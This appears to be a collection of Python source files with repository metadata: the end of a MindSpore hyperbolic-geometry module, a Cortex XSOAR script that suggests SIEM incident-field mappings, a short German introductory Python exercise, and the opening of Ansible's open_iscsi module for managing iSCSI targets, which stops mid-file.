self.klein_to_poincare(x_midpoint, c) return x_p class ClampTanh(Cell): """clamp tanh class""" def __init__(self): """init fun""" super(ClampTanh, self).__init__() self.clamp = Clamp() self.tanh = Tanh() def construct(self, x, c=15): """class construction""" return self.tanh(self.clamp(x, -c, c)) class MobiusMatvec(Cell): """mobius matvec class""" def __init__(self, min_norm): """init fun""" super(MobiusMatvec, self).__init__() self.min_norm = min_norm self.norm_k = Norm(axis=-1, keep_dims=True) self.artanh = Artanh() self.norm_k = Norm(axis=-1, keep_dims=True) self.clamp_min = ClampMin() self.transpose = Transpose() self.clamp_tanh = ClampTanh() def construct(self, m, x, c): """class construction""" sqrt_c = c ** 0.5 x_norm = self.clamp_min(self.norm_k(x), self.min_norm) mx = matmul(x, self.transpose(m, (1, 0))) mx_norm = self.clamp_min(self.norm_k(x), self.min_norm) t1 = self.artanh(sqrt_c * x_norm) t2 = self.clamp_tanh(mx_norm / x_norm * t1) res_c = t2 * mx / (mx_norm * sqrt_c) cond = mnp.array([[0]] * len(mx)) res_0 = mnp.zeros(1) res = mnp.where(cond, res_0, res_c) return res class Expmap0(Cell): """expmap0 class""" def __init__(self, min_norm): """init fun""" super(Expmap0, self).__init__() self.clamp_min = ClampMin() self.min_norm = min_norm self.clamp_tanh = ClampTanh() self.norm_k = Norm(axis=-1, keep_dims=True) def construct(self, u, c): """constructfun""" sqrt_c = c ** 0.5 u_norm = self.clamp_min(self.norm_k(u), self.min_norm) gamma_1 = self.clamp_tanh(sqrt_c * u_norm) * u / (sqrt_c * u_norm) return gamma_1 class MobiusAdd(Cell): """mobius add""" def __init__(self, min_norm): """init fun""" super(MobiusAdd, self).__init__() self.pow = Pow() self.sum = ReduceSum(keep_dims=True) self.clamp_min = ClampMin() self.min_norm = min_norm def construct(self, x, y, c, dim=-1): """constructfun""" x2 = self.sum(self.pow(x, 2), dim) y2 = self.sum(self.pow(y, 2), dim) xy = self.sum(x * y, dim) num = (1 + 2 * c * xy + c * y2) * x + (1 - c * x2) * y denom = 1 + 2 * c * xy + c ** 2 * x2 * y2 return num / self.clamp_min(denom, self.min_norm)
30.920863
114
0.591671
be9a0ae08e5d2b0cf33ab9e197160664f5587480
31,571
py
Python
Packs/Base/Scripts/DBotSuggestClassifierMapping/DBotSuggestClassifierMapping.py
diCagri/content
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
[ "MIT" ]
799
2016-08-02T06:43:14.000Z
2022-03-31T11:10:11.000Z
Packs/Base/Scripts/DBotSuggestClassifierMapping/DBotSuggestClassifierMapping.py
diCagri/content
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
[ "MIT" ]
9,317
2016-08-07T19:00:51.000Z
2022-03-31T21:56:04.000Z
Packs/Base/Scripts/DBotSuggestClassifierMapping/DBotSuggestClassifierMapping.py
diCagri/content
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
[ "MIT" ]
1,297
2016-08-04T13:59:00.000Z
2022-03-31T23:43:06.000Z
from CommonServerPython import * import itertools import numbers import re import socket from collections import Counter from collections import OrderedDict from datetime import datetime, timedelta INCIDENT_FIELD_NAME = "name" INCIDENT_FIELD_MACHINE_NAME = "cliName" INCIDENT_FIELD_SYSTEM = "system" SAMPLES_INCOMING = 'incomingSamples' SAMPLES_SCHEME = 'scheme' SAMPLES_OUTGOING = 'outgoingSamples' COUNT_KEYWORD = "count" SIEM_FIELDS = {'Account ID': {'aliases': ['accountid', 'account id'], 'validators': []}, 'Account Name': {'aliases': ['accountname', 'account name'], 'validators': ['validate_alphanumeric_with_common_punct']}, 'Account Type': {'aliases': ['accounttype', 'account type'], 'validators': ['validate_alphanumeric_with_common_punct']}, 'Agent ID': {'aliases': ['agentid', 'agent id', 'sensor id', 'tenant id'], 'validators': []}, 'Tenant Name': {'aliases': ['tenant name', 'tenant name'], 'validators': ['validate_alphanumeric_with_common_punct']}, 'App': {'aliases': ['app', 'app'], 'validators': ['validate_alphanumeric_with_common_punct']}, 'Attachment Name': {'aliases': ['attachmentname', 'attachment name'], 'validators': ['validate_alphanumeric_with_common_punct']}, 'Blocked Action': {'aliases': ['blockedaction', 'blocked action', 'prevention mode'], 'validators': ['validate_alphanumeric_with_common_punct']}, 'City': {'aliases': ['city'], 'validators': ['validate_alphanumeric_with_common_punct']}, 'Command Line': {'aliases': ['commandline', 'command line', 'cmdline', 'cmd line', 'process file name', 'process file path', 'process full path', 'process full path', 'cmd'], 'validators': ['validate_file_full_path']}, 'Event ID': {'aliases': ['eventid', 'event id', 'alert id', 'offense id'], 'validators': ['validate_alphanumeric_with_common_punct']}, 'Event Type': {'aliases': ['eventtype', 'event type', 'alert type'], 'validators': ['validate_alphanumeric_with_common_punct']}, 'Company Name': {'aliases': ['companyname', 'company name', 'company', 'customer'], 'validators': ['validate_alphanumeric_with_common_punct']}, 'Country': {'aliases': ['country', 'country name'], 'validators': ['validate_alphanumeric_with_common_punct']}, 'Critical Assets': {'aliases': ['criticalassets', 'critical assets'], 'validators': ['validate_alphanumeric_with_common_punct']}, 'Description': {'aliases': ['description'], 'validators': ['validate_alphanumeric_with_common_punct']}, 'Destination IP': {'aliases': ['destinationip', 'destination ip', 'destination address', 'dest ip', 'dest address', 'target address', 'dst'], 'validators': ['validate_ip']}, 'Destination Port': {'aliases': ['destinationport', 'destination port', 'dst port', 'dest port'], 'validators': ['validate_number']}, 'Email BCC': {'aliases': ['emailbcc', 'email bcc', 'bcc recipient', 'bcc'], 'validators': ['validate_email']}, 'Email Body': {'aliases': ['emailbody', 'email body', 'body'], 'validators': []}, 'Email Body Format': {'aliases': ['emailbodyformat', 'email body format', 'body type', 'body content type'], 'validators': []}, 'Email Body HTML': {'aliases': ['emailbodyhtml', 'email body html'], 'validators': []}, 'Email CC': {'aliases': ['emailcc', 'email cc', 'cc recipient', 'cc'], 'validators': ['validate_email']}, 'Email From': {'aliases': ['emailfrom', 'email from', 'from'], 'validators': ['validate_email']}, 'Email HTML': {'aliases': ['emailhtml', 'email html'], 'validators': []}, 'Email Headers': {'aliases': ['emailheaders', 'email headers', 'headers', 'message headers', 'internet message header'], 'validators': ['']}, 'Email In Reply To': {'aliases': ['emailinreplyto', 'email in reply to'], 'validators': []}, 'Email Received': {'aliases': ['emailreceived', 'email received', 'received date time', 'received time'], 'validators': ['validate_date']}, 'Email Reply To': {'aliases': ['emailreplyto', 'email replay to', 'reply to'], 'validators': []}, 'Email Sender IP': {'aliases': ['emailsenderip', 'email sender ip'], 'validators': ['validate_ip']}, 'Email Size': {'aliases': ['emailsize', 'email size'], 'validators': ['validate_number']}, 'Email Subject': {'aliases': ['emailsubject', 'email subject', 'subject'], 'validators': []}, 'Email To': {'aliases': ['emailto', 'email to', 'to recipients', 'recipients', 'recipient'], 'validators': ['validate_email']}, 'File Hash': {'aliases': ['filehash', 'file hash', 'event file hash', 'md5', 'sha1', 'sha256'], 'validators': ['validate_hash']}, 'File Name': {'aliases': ['filename', 'file name'], 'validators': []}, 'File Path': {'aliases': ['filepath', 'file path', 'full path', 'full path'], 'validators': ['validate_file_full_path']}, 'File Size': {'aliases': ['filesize', 'file size'], 'validators': ['validate_number']}, 'File Type': {'aliases': ['filetype', 'file type'], 'validators': ['validate_alphanumeric_with_common_punct']}, 'Source Hostname': { 'aliases': ['source hostname', 'source host name', 'src hostname', 'src host name'], 'validators': ['validate_hostname']}, 'Destination Hostname': { 'aliases': ['destination hostname', 'destination host name', 'dest hostname', 'dest host name', 'dst hostname', 'dst host name', 'target hostname', 'target host name'], 'validators': ['validate_hostname']}, 'Source Network': {'aliases': ['source network', 'sourcenetwork', 'src network'], 'validators': ['validate_alphanumeric_with_common_punct']}, 'Destination Network': {'aliases': ['destination network', 'destinationnetwork', 'dest network', 'dst network', 'target netwrok'], 'validators': ['validate_alphanumeric_with_common_punct']}, 'Device Name': { 'aliases': ['devicename', 'device name', 'endpoint name', 'end point name'], 'validators': ['validate_alphanumeric_with_common_punct']}, 'MAC Address': {'aliases': ['macaddress', 'mac address', 'mac', 'src mac', 'source mac'], 'validators': ['validate_mac']}, 'PID': {'aliases': ['pid', 'process pid', 'parent process pid', 'target process pid'], 'validators': ['validate_number']}, 'Parent Process ID': {'aliases': ['parentprocessid', 'parent process id'], 'validators': ['validate_number']}, 'Region': {'aliases': ['region', 'region'], 'validators': ['validate_alphanumeric_with_common_punct']}, 'Signature': {'aliases': ['signature', 'signature'], 'validators': []}, 'Source IP': { 'aliases': ['sourceip', 'source ip', 'src ip', 'src address', 'source address', 'computer ip', 'device ip', 'attacker address', 'attacker ip', 'sender ip', 'sender address', 'agent ip'], 'validators': ['validate_ip']}, 'Source Port': {'aliases': ['sourceport', 'source port', 'src port'], 'validators': ['validate_number']}, 'OS': {'aliases': ['operating system', 'os type', 'os version', 'os'], 'validators': []}, 'Subtype': {'aliases': ['subtype', 'subtype'], 'validators': ['validate_alphanumeric_with_common_punct']}, 'Terminated Action': {'aliases': ['terminatedaction', 'terminated action'], 'validators': []}, 'Traps ID': {'aliases': ['trapsid', 'traps id', 'trap id'], 'validators': []}, 'Source Username': {'aliases': ['username', 'username', 'user name', 'src user name', 'src username', 'source username', 'source user name'], 'validators': ['validate_alphanumeric_with_common_punct']}, 'Destination Username': {'aliases': ['destination username', 'destination user name', 'dest username', 'dest user name', 'dst username', 'dst user name', 'target user name', 'target username'], 'validators': ['validate_alphanumeric_with_common_punct']}, 'Detection URL': {'aliases': ['detection url'], 'validators': ['validate_url']}, 'Vendor ID': {'aliases': ['vendorid', 'vendor id'], 'validators': []}, 'Vendor Product': {'aliases': ['vendorproduct', 'vendor product'], 'validators': ['validate_alphanumeric_with_common_punct']}, 'category': {'aliases': ['category', 'category'], 'validators': ['validate_alphanumeric_with_common_punct']}, 'details': {'aliases': ['details', 'description'], 'validators': ['validate_alphanumeric_with_common_punct']}, 'name': {'aliases': ['name', 'Name', 'alert name', 'event name', 'rule name', 'title'], 'validators': ['validate_alphanumeric_with_common_punct', 'extact_name_math']}, 'occurred': {'aliases': ['occurred', 'occured', 'occurred time', 'event start time', 'event at', 'event time', 'start time', 'create time', 'timestamp', 'unix time', 'click time'], 'validators': ['validate_date']}, 'owner': {'aliases': ['owner'], 'validators': []}, 'severity': {'aliases': ['event severity', 'severity', 'event priority', 'priority', 'urgency'], 'validators': []}, 'Log Source': {'aliases': ['log source', 'log sources', 'logsource'], 'validators': []}, 'Protocol': {'aliases': ['protocol'], 'validators': []}, } suffix_mapping = { 'ing': '', 'ly': '', 'ed': '', 'ious': '', 'ies': 'y', 'ive': '', 'es': '', 's': '' } class DateValidator: def __init__(self): year_options = ['%y', '%Y'] months_options = ['%m', '%B'] day_options = ['%d'] delimeters_options = [".", "-", "/", "\\"] self.common_separators = [' ', 'T', ','] date_formats_options = [] # type: List[tuple] for delimeter in delimeters_options: delimeters = [delimeter] date_formats_options += list( itertools.product(year_options, delimeters, months_options, delimeters, day_options)) date_formats_options += list( itertools.product(year_options, delimeters, day_options, delimeters, months_options)) date_formats_options += list( itertools.product(day_options, delimeters, months_options, delimeters, year_options)) date_formats_options += list( itertools.product(day_options, delimeters, months_options, delimeters, year_options)) self.date_formats_options = map(lambda x: "".join(x), date_formats_options) def try_parsing_date(self, text): for fmt in self.date_formats_options: try: return datetime.strptime(text, fmt) except ValueError: pass return None def has_valid_date(self, text): parts = [] # type: List[str] for sep in self.common_separators: parts += text.split(sep) return any(map(lambda x: self.try_parsing_date(x) is not None, parts)) @staticmethod def is_datetime_last_years(d, number_of_years=3): if d is not None: now = datetime.now() return now - timedelta(days=365 * number_of_years) <= d <= now + timedelta(days=365 * number_of_years) return False @staticmethod def safe_parse_timestamp(value): try: d = datetime.fromtimestamp(int(value)) return d except Exception: return None def is_unix_timestamp(self, value): try: value = int(value) return self.is_datetime_last_years(self.safe_parse_timestamp(value)) or self.is_datetime_last_years( self.safe_parse_timestamp(value / 1000)) except Exception: return False class Validator: def __init__(self): self.EMAIL_REGEX = re.compile('^\w+([\.-]?\w+)*@\w+([\.-]?\w+)*(\.\w{2,3})+$') self.NUMBER_REGEX = re.compile('^([0-9]+)$') self.SHA256_REGEX = re.compile('^[A-Fa-f0-9]{64}$') self.MD5_REGEX = re.compile('^[a-fA-F0-9]{32}$') self.HASH_REGEX = re.compile('^[a-fA-F0-9]+$') self.MAC_REGEX = re.compile('^[0-9a-f]{2}([-:]?)[0-9a-f]{2}(\\1[0-9a-f]{2}){4}$', re.IGNORECASE) self.URL_REGEX = re.compile( r'^(?:http|ftp|hxxp)s?://' # http:// or https:// r'(?:(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\.)+(?:[A-Z]{2,6}\.?|[A-Z0-9-]{2,}\.?)|' # domain... r'localhost|' # localhost... r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})' # ...or ip r'(?::\d+)?' # optional port r'(?:/?|[/?]\S+)$', re.IGNORECASE) self.COMMON_NAME_CHARECTERS = re.compile('^[0-9a-zA-Z"\s_\-\'./]+$') self.HOSTNAME_PART_REGEX = re.compile('(?!-)[A-Z\d-]{1,63}(?<!-)$') self.FULL_FILE_PATH_REGEX = re.compile('^((?:/[^/\n]+)*|.*(\\\\.*))$') self.date_validator = DateValidator() def validate_regex(self, pattern, value, json_field_name=None): if isinstance(value, basestring): return pattern.match(value) is not None return False def validate_ip(self, field_name, value, json_field_name=None): try: socket.inet_aton(value) return True except socket.error: return False def validate_url(self, field_name, value, json_field_name=None): return self.validate_regex(self.URL_REGEX, value) def validate_email(self, field_name, value, json_field_name=None): return self.validate_regex(self.EMAIL_REGEX, value) def validate_number(self, field_name, value, json_field_name=None): if isinstance(value, numbers.Number): return True else: return self.validate_regex(self.NUMBER_REGEX, value, json_field_name=None) def validate_not_count(self, field_name, value): is_count = COUNT_KEYWORD in field_name.lower() and self.validate_number(field_name, value) return not is_count def validate_sha256(self, field_name, value, json_field_name=None): return self.validate_regex(self.SHA256_REGEX, value) def validate_md5(self, field_name, value, json_field_name=None): return self.validate_regex(self.MD5_REGEX, value) def validate_hash(self, field_name, value, json_field_name=None): return self.validate_regex(self.HASH_REGEX, value) and len(value) % 2 == 0 def validate_mac(self, field_name, value, json_field_name=None): return self.validate_regex(self.MAC_REGEX, value) def validate_hostname(self, field_name, hostname, json_field_name=None): if not isinstance(hostname, basestring) or len(hostname) > 255: # type: ignore return False if hostname[-1] == ".": # type: ignore hostname = hostname[:-1] # type: ignore allowed = re.compile("(?!-)[A-Z\d-]{1,63}(?<!-)$", re.IGNORECASE) return all(allowed.match(x) for x in hostname.split(".")) def validate_date(self, field_name, value, json_field_name=None): if self.validate_number("", value): return self.date_validator.is_unix_timestamp(value) else: return self.date_validator.has_valid_date(value) def validate_alphanumeric_with_common_punct(self, field_name, value, json_field_name=None): return self.validate_regex(self.COMMON_NAME_CHARECTERS, value) def validate_file_full_path(self, field_name, value, json_field_name=None): return self.validate_regex(self.FULL_FILE_PATH_REGEX, value) def extact_name_math(self, field_name, value, json_field_name=None): return field_name == json_field_name def validate(self, validator_name, field_name, value, json_field_name=None): validate_func = getattr(self, validator_name) return validate_func(field_name, value, json_field_name) def is_sublist_of_list(s, lst): sub_set = False if s == []: sub_set = True elif s == lst: sub_set = True elif len(s) > len(lst): sub_set = False else: for i in range(len(lst)): if lst[i] == s[0]: n = 1 while (n < len(s)) and (i + n) < len(lst) and (lst[i + n] == s[n]): n += 1 if n == len(s): sub_set = True return sub_set def lemma_word(word): for suffix in suffix_mapping: if word.endswith(suffix): candidate = word[:-len(suffix)] + suffix_mapping[suffix] if candidate in ALL_POSSIBLE_TERMS_SET or candidate.lower() in ALL_POSSIBLE_TERMS_SET: return candidate.lower() return word.lower() def remove_dups(seq): return list(OrderedDict.fromkeys(seq)) def split_by_non_alpha_numeric(_string): return filter(lambda x: x, re.split('[^a-zA-Z0-9]', _string)) def camel_case_split(identifier): matches = re.finditer('.+?(?:(?<=[a-z])(?=[A-Z])|(?<=[A-Z])(?=[A-Z][a-z])|$)', identifier) return [m.group(0) for m in matches] def flatten_json(y): out = {} has_more_than_one_value = [] delimeter = '.' def flatten(x, name=''): if type(x) is dict: for a in x: flatten(x[a], name + a + delimeter) elif type(x) is list and len(x) > 0 and type(x) is not dict: i = 0 for a in x: flatten(a, name + "[" + str(i) + "]" + delimeter) i += 1 if i > 1: has_more_than_one_value.append(name[:-1]) else: out[name[:-1]] = x flatten(y) return out, has_more_than_one_value def number_of_terms(value): return len(value.split(" ")) def normilize(value): parts = [] # type: List[str] for part in split_by_non_alpha_numeric(value): parts += camel_case_split(part) terms = map(lemma_word, parts) return remove_dups(terms) def validate_value_with_validator(alias, value, json_field_name=None): field_name = ALIASING_MAP[alias] validators = SIEM_FIELDS[field_name]['validators'] # type: ignore validators = [v for v in validators if v] if len(validators) == 0: return True validator_results = [] for validator_name in validators: validator_results.append(VALIDATOR.validate(validator_name, alias, value, json_field_name)) return all(validator_results) def get_candidates(json_field_name): json_field_terms = normilize(json_field_name) aliases_terms = ALIASING_TERMS_MAP.items() match_terms = map(lambda x: x[0], filter(lambda alias_terms: is_sublist_of_list(alias_terms[1], json_field_terms), aliases_terms)) return sorted(match_terms, reverse=True, key=number_of_terms) def suggest_field_with_alias(json_field_name, json_field_value=None): norm_json_field_name = " ".join(normilize(json_field_name)) candidates = get_candidates(json_field_name) if json_field_value is not None: candidates = filter(lambda c: validate_value_with_validator(c, json_field_value, norm_json_field_name), candidates) if len(candidates) > 0: alias = candidates[0] return ALIASING_MAP[alias], alias return None, None def suggest_field(json_field_name, json_field_value=None): return suggest_field_with_alias(json_field_name, json_field_value)[0] def generate_aliases(field): aliases = [] aliases.append(field.lower()) aliases.append(" ".join(normilize(field))) aliases.append("".join(normilize(field))) return aliases def get_aliasing(siem_fields): aliasing_map = {} aliases_terms_map = {} for field, data in siem_fields.items(): for alias in data['aliases']: aliasing_map[alias] = field aliases_terms_map[alias] = alias.split(" ") return aliasing_map, aliases_terms_map def is_value_substring_of_one_values(value, all_values): return any(map(lambda field: value in field, all_values)) def get_alias_index(field_name, alias): return SIEM_FIELDS[field_name]['aliases'].index(alias) # type: ignore def get_most_relevant_json_field(field_name, json_field_to_alias): if len(json_field_to_alias) == 0: return # calculate jaccard score for each alias, and get the candidates with max score scores = {} for json_field, alias in json_field_to_alias.items(): scores[json_field] = jaccard_similarity_for_string_terms(json_field, alias) scores = {k: v for k, v in scores.items() if v == max(scores.values())} # calculate jaccard score for each field, and get the candidates with max score for json_field, alias in json_field_to_alias.items(): scores[json_field] = jaccard_similarity_for_string_terms(json_field, field_name) scores = {k: v for k, v in scores.items() if v == max(scores.values())} # for candidates with the same score with the least alias index candidates = sorted(list(scores.keys()), key=lambda json_field: get_alias_index(field_name, json_field_to_alias[json_field])) return candidates[0] def match_for_incident(incident_to_match): flat_incident, more_than_one_field_items = flatten_json(incident_to_match) incident = {k: v for k, v in flat_incident.items() if not is_value_substring_of_one_values(k, more_than_one_field_items)} if SCHEME_ONLY: incident = {k: v for k, v in incident.items() if not k.endswith(COUNT_KEYWORD)} else: incident = {k: v for k, v in incident.items() if v is not None and VALIDATOR.validate_not_count(k, v)} mapping = {} # type: ignore for json_field_name, json_field_value in incident.items(): # we try to get suggestion if it's scheme or if the value is not empty if SCHEME_ONLY or json_field_value: incident_field_suggestion, alias = suggest_field_with_alias(json_field_name, json_field_value) if incident_field_suggestion: if incident_field_suggestion not in mapping: mapping[incident_field_suggestion] = {} mapping[incident_field_suggestion][json_field_name] = alias return {incident_field_name: get_most_relevant_json_field(incident_field_name, json_field_to_alias) for incident_field_name, json_field_to_alias in mapping.items()} def jaccard_similarity(list1, list2): intersection = len(list(set(list1).intersection(list2))) union = (len(list1) + len(list2)) - intersection return float(intersection) / union def jaccard_similarity_for_string_terms(str1, str2): return jaccard_similarity(normilize(str1), normilize(str2)) def get_most_relevant_match_for_field(field_name, cnt): # return exact match if field_name in cnt: return field_name suggestions_with_jaccard_score = [(suggestion, jaccard_similarity_for_string_terms(field_name, suggestion)) for suggestion in cnt.keys()] suggestions_with_jaccard_score = sorted(suggestions_with_jaccard_score, key=lambda x: x[1], reverse=True) # check for extact terms if suggestions_with_jaccard_score[0][1] == 1: return suggestions_with_jaccard_score[0][0] # if we have only scheme or all the values are the same if SCHEME_ONLY or len(set(cnt.values())) == 1: return suggestions_with_jaccard_score[0][0] return cnt.most_common()[0][0] def match_for_incidents(incidents_to_match): fields_cnt = {} # type: Dict[str, Counter] for flat_incident in incidents_to_match: for k, v in match_for_incident(flat_incident).items(): if k not in fields_cnt: fields_cnt[k] = Counter() if v: fields_cnt[k][v] += 1 mapping_result = {field_name: get_most_relevant_match_for_field(field_name, field_cnt) for field_name, field_cnt in fields_cnt.items()} return mapping_result def format_value_to_mapper(json_field): parts = json_field.split('.', 1) root = parts[0] accessor = "" if len(parts) > 1: accessor = parts[1] res = { "simple": "", "complex": { "root": root, "accessor": accessor, "filters": [], "transformers": [] } } return res def format_incident_field_to_mapper(incident_field_name, field_name_to_machine_name): res = { "simple": "", "complex": { "root": field_name_to_machine_name[incident_field_name], "accessor": "", "filters": [], "transformers": [] } } return res def verify_non_empty_values_in_incidents(expression, incidents): for incident in incidents: res = demisto.dt(incident, expression) if res: return True return False def get_complex_value_key(complex_value): if 'complex' in complex_value: complex_value = complex_value['complex'] readable_value = complex_value.get('root') if complex_value.get('accessor'): readable_value += "." + complex_value.get('accessor') return readable_value def combine_mappers(original_mapper, new_mapper, incidents): mapper = new_mapper if original_mapper: mapper.update(original_mapper) return mapper def filter_by_dict_by_keys(_dict, keys): return {k: v for k, v in _dict.items() if k in keys} def parse_incident_sample(sample): if type(sample) is dict and 'rawJSON' in sample: incident = json.loads(sample['rawJSON']) else: try: incident = json.loads(sample) except Exception: incident = sample return incident SCHEME_ONLY = False VALIDATOR = Validator() ALIASING_MAP, ALIASING_TERMS_MAP, FIELD_NAME_TO_CLI_NAME = {}, {}, {} ALL_POSSIBLE_TERMS_SET = set() def init(): global SCHEME_ONLY, VALIDATOR, \ ALIASING_MAP, ALIASING_TERMS_MAP, \ ALL_POSSIBLE_TERMS_SET, SIEM_FIELDS, FIELD_NAME_TO_CLI_NAME SCHEME_ONLY = demisto.args().get('incidentSamplesType') in [SAMPLES_OUTGOING, SAMPLES_SCHEME] fields = demisto.args().get('incidentFields', {}) if fields and len(fields) > 0: fields_names = map(lambda x: x['name'], fields) SIEM_FIELDS = filter_by_dict_by_keys(SIEM_FIELDS, fields_names) for custom_field in filter(lambda x: not x['system'], fields): field_name = custom_field[INCIDENT_FIELD_NAME] SIEM_FIELDS[field_name] = {'aliases': generate_aliases(field_name), 'validators': []} FIELD_NAME_TO_CLI_NAME = {field[INCIDENT_FIELD_NAME]: field[INCIDENT_FIELD_MACHINE_NAME] for field in fields} ALIASING_MAP, ALIASING_TERMS_MAP = get_aliasing(SIEM_FIELDS) terms = [] # type: List[str] for field in SIEM_FIELDS.values(): for alias in field['aliases']: # type: ignore terms += alias.split(" ") ALL_POSSIBLE_TERMS_SET = set(terms) def main(): init() incidents_samples = demisto.args().get('incidentSamples') if incidents_samples: if isinstance(incidents_samples, basestring): incidents_samples = json.loads(incidents_samples) # type: ignore incidents = map(parse_incident_sample, incidents_samples) else: return_error("Could not parse incident samples") original_mapper = demisto.args().get('currentMapper') if type(original_mapper) is not dict or len(original_mapper) == 0: original_mapper = None matches = match_for_incidents(incidents) if demisto.args().get('incidentSamplesType') == SAMPLES_OUTGOING: mapper = {v: format_incident_field_to_mapper(k, FIELD_NAME_TO_CLI_NAME) for k, v in matches.items() if k in FIELD_NAME_TO_CLI_NAME} else: mapper = {k: format_value_to_mapper(v) for k, v in matches.items()} mapper = combine_mappers(original_mapper, mapper, incidents) return mapper if __name__ in ['__main__', '__builtin__', 'builtins']: demisto.results(main())
41.982713
119
0.565424
beb9462e7eb4cb9120161d5efcebb2195448e61e
388
py
Python
vorl1.py
haenno/FOM-BSc-WI-Semster3-Skriptsprachen-Python
bb34b6b1ba7e8fe7b22ce598a80d5011122c2d4a
[ "MIT" ]
null
null
null
vorl1.py
haenno/FOM-BSc-WI-Semster3-Skriptsprachen-Python
bb34b6b1ba7e8fe7b22ce598a80d5011122c2d4a
[ "MIT" ]
null
null
null
vorl1.py
haenno/FOM-BSc-WI-Semster3-Skriptsprachen-Python
bb34b6b1ba7e8fe7b22ce598a80d5011122c2d4a
[ "MIT" ]
null
null
null
# 1. Vorlesung mit Python (3. zu Skriptsprachen insges. -- 26.09.2020 - 1. PDF dazu) x = input ("Ihr Name? ") X = "Hallo " + x print (x) x = input ("Ihr Alter? ") x = int(x) - 5 print (x) # Seite 12 liste = "Hello World" print (liste) print (liste[2]) # Seite 17 strvar = "ABC" print (strvar) strvar = "ABC" * 5 print (strvar) #strvar = "ABC" + 5 #datentypfehler print (strvar)
13.857143
84
0.608247
22a835b39d5c26d87758f88e10e54d6007c99983
11,393
py
Python
exercises/networking_selfpaced/networking-workshop/collections/ansible_collections/community/general/plugins/modules/system/open_iscsi.py
tr3ck3r/linklight
5060f624c235ecf46cb62cefcc6bddc6bf8ca3e7
[ "MIT" ]
null
null
null
exercises/networking_selfpaced/networking-workshop/collections/ansible_collections/community/general/plugins/modules/system/open_iscsi.py
tr3ck3r/linklight
5060f624c235ecf46cb62cefcc6bddc6bf8ca3e7
[ "MIT" ]
null
null
null
exercises/networking_selfpaced/networking-workshop/collections/ansible_collections/community/general/plugins/modules/system/open_iscsi.py
tr3ck3r/linklight
5060f624c235ecf46cb62cefcc6bddc6bf8ca3e7
[ "MIT" ]
null
null
null
#!/usr/bin/python # -*- coding: utf-8 -*- # Copyright: (c) 2013, Serge van Ginderachter <[email protected]> # GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt) from __future__ import absolute_import, division, print_function __metaclass__ = type ANSIBLE_METADATA = {'metadata_version': '1.1', 'status': ['preview'], 'supported_by': 'community'} DOCUMENTATION = r''' --- module: open_iscsi author: - Serge van Ginderachter (@srvg) short_description: Manage iSCSI targets with Open-iSCSI description: - Discover targets on given portal, (dis)connect targets, mark targets to manually or auto start, return device nodes of connected targets. requirements: - open_iscsi library and tools (iscsiadm) options: portal: description: - The IP address of the iSCSI target. type: str aliases: [ ip ] port: description: - The port on which the iSCSI target process listens. type: str default: 3260 target: description: - The iSCSI target name. type: str aliases: [ name, targetname ] login: description: - Whether the target node should be connected. type: bool aliases: [ state ] node_auth: description: - The value for C(discovery.sendtargets.auth.authmethod). type: str default: CHAP node_user: description: - The value for C(discovery.sendtargets.auth.username). type: str node_pass: description: - The value for C(discovery.sendtargets.auth.password). type: str auto_node_startup: description: - Whether the target node should be automatically connected at startup. type: bool aliases: [ automatic ] discover: description: - Whether the list of target nodes on the portal should be (re)discovered and added to the persistent iSCSI database. - Keep in mind that C(iscsiadm) discovery resets configuration, like C(node.startup) to manual, hence combined with C(auto_node_startup=yes) will always return a changed state. type: bool show_nodes: description: - Whether the list of nodes in the persistent iSCSI database should be returned by the module. type: bool ''' EXAMPLES = r''' - name: Perform a discovery on 10.1.2.3 and show available target nodes open_iscsi: show_nodes: yes discover: yes portal: 10.1.2.3 # NOTE: Only works if exactly one target is exported to the initiator - name: Discover targets on portal and login to the one available open_iscsi: portal: '{{ iscsi_target }}' login: yes discover: yes - name: Connect to the named target, after updating the local persistent database (cache) open_iscsi: login: yes target: iqn.1986-03.com.sun:02:f8c1f9e0-c3ec-ec84-c9c9-8bfb0cd5de3d - name: Disconnect from the cached named target open_iscsi: login: no target: iqn.1986-03.com.sun:02:f8c1f9e0-c3ec-ec84-c9c9-8bfb0cd5de3d ''' import glob import os import time from ansible.module_utils.basic import AnsibleModule ISCSIADM = 'iscsiadm' def compare_nodelists(l1, l2): l1.sort() l2.sort() return l1 == l2 def iscsi_get_cached_nodes(module, portal=None): cmd = '%s --mode node' % iscsiadm_cmd (rc, out, err) = module.run_command(cmd) if rc == 0: lines = out.splitlines() nodes = [] for line in lines: # line format is "ip:port,target_portal_group_tag targetname" parts = line.split() if len(parts) > 2: module.fail_json(msg='error parsing output', cmd=cmd) target = parts[1] parts = parts[0].split(':') target_portal = parts[0] if portal is None or portal == target_portal: nodes.append(target) # older versions of scsiadm don't have nice return codes # for newer versions see iscsiadm(8); also usr/iscsiadm.c for details # err can contain [N|n]o records... elif rc == 21 or (rc == 255 and "o records found" in err): nodes = [] else: module.fail_json(cmd=cmd, rc=rc, msg=err) return nodes def iscsi_discover(module, portal, port): cmd = '%s --mode discovery --type sendtargets --portal %s:%s' % (iscsiadm_cmd, portal, port) (rc, out, err) = module.run_command(cmd) if rc > 0: module.fail_json(cmd=cmd, rc=rc, msg=err) def target_loggedon(module, target): cmd = '%s --mode session' % iscsiadm_cmd (rc, out, err) = module.run_command(cmd) if rc == 0: return target in out elif rc == 21: return False else: module.fail_json(cmd=cmd, rc=rc, msg=err) def target_login(module, target, portal=None, port=None): node_auth = module.params['node_auth'] node_user = module.params['node_user'] node_pass = module.params['node_pass'] if node_user: params = [('node.session.auth.authmethod', node_auth), ('node.session.auth.username', node_user), ('node.session.auth.password', node_pass)] for (name, value) in params: cmd = '%s --mode node --targetname %s --op=update --name %s --value %s' % (iscsiadm_cmd, target, name, value) (rc, out, err) = module.run_command(cmd) if rc > 0: module.fail_json(cmd=cmd, rc=rc, msg=err) cmd = '%s --mode node --targetname %s --login' % (iscsiadm_cmd, target) if portal is not None and port is not None: cmd += ' --portal %s:%s' % (portal, port) (rc, out, err) = module.run_command(cmd) if rc > 0: module.fail_json(cmd=cmd, rc=rc, msg=err) def target_logout(module, target): cmd = '%s --mode node --targetname %s --logout' % (iscsiadm_cmd, target) (rc, out, err) = module.run_command(cmd) if rc > 0: module.fail_json(cmd=cmd, rc=rc, msg=err) def 